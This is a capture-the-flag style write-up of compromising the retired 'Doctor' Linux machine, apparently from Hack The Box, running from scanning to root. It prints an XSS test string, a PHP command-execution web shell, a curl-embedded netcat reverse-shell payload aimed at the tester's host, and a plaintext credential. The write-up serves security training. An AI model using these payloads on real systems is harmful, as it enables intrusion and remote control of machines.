Doctor machine is a vulnerable machine with Linux operating system among retired machines. We are expected to obtain user and root flags using these vulnerabilities.
Let’s run a network scan with nmap to recognize the target machine
Classic Scan
Full Port Scan
As a result of network scanning, 22/tcp ssh OpenSSH 8.2, 80/tcp http Apache httpd, 8089/tcp ssl/http Splunkd ports are open.
Since port 80 is open, we continue via browser to perform web enumueration.
We have performed enumeration on the web, we have not obtained enough information, we are performing directory and file scans with gobuster
We did not find any results in Gobuster scanning. So much inconclusiveness 😊 We provide web ebumeration again in case there is something overlooked, info@doctors.htb attracts our attention on the main page.
Here we edit the /etc/hosts file and access the site again.
After editing here, we access doctors.htb, where we are greeted by the login page
Default passwords are waving and we can’t log in. I registr myself in the Registry tab
Let’s log in to the login screen with the user we created
After logging in, we continue enumeration
We looked at the source code, looked at the developer mode, did a gobuster directory scan and got no significant results.
Here we performed emueration on the interface (to detect a corruption in the input or url values)
Here we see the New Message section as the input field, let’s add here
Adding can be done. Let’s add input values outside the normal flow here in the attacker’s head
Adding can be done. Let’s add input values outside the normal flow here in the attacker’s head
Adding can be done. Let's add input values outside the normal flow here in the attacker's head
<script>alert("hi")</script>
<?php system($_GET['cmd']);?>
whoami
pwd
commands were added, but no input value was received in the input response.
These commands do not give an output in response to any input value, let’s check the interaction using curl to see if the commands are working
As you can see, the command is working here. Let’s try to get ourselves a revershell here
curl http://10.10.14.13/$(nc.traditional$IFS-e/bin/sh$IFS’10.10.14.13’$IFS’4747′)
We are trying to get reversehll using the command
We have our shell with low privileges so we need to perform a ptivilige escalaiton.
We provide local enumeration by passing the Linpeas tool
Here the backup file attracted our attention when we looked for passowrd information in it.
Obtained password for user Shaun
And we were able to get our user flag.
Since we don’t have access to the /root directory, we continue with enumeration.
linpeas.sh did not give us detailed information, and in local enumeration we could not get any information from the files. There was a splunkd service here, let’s try to connect to it
Here it gives a version warning
When we clicked on Services it asked us for credentials shaun:We were able to log in using Guitar123 credentials.
There was a lot of tab screen in Services
First, let’s start with the version and see if there is an exploit or not
We saw that there is an RCE vulnerability
We dowloand the exploit code on Github
Let’s try to run the Python code
This is how we got root authorization.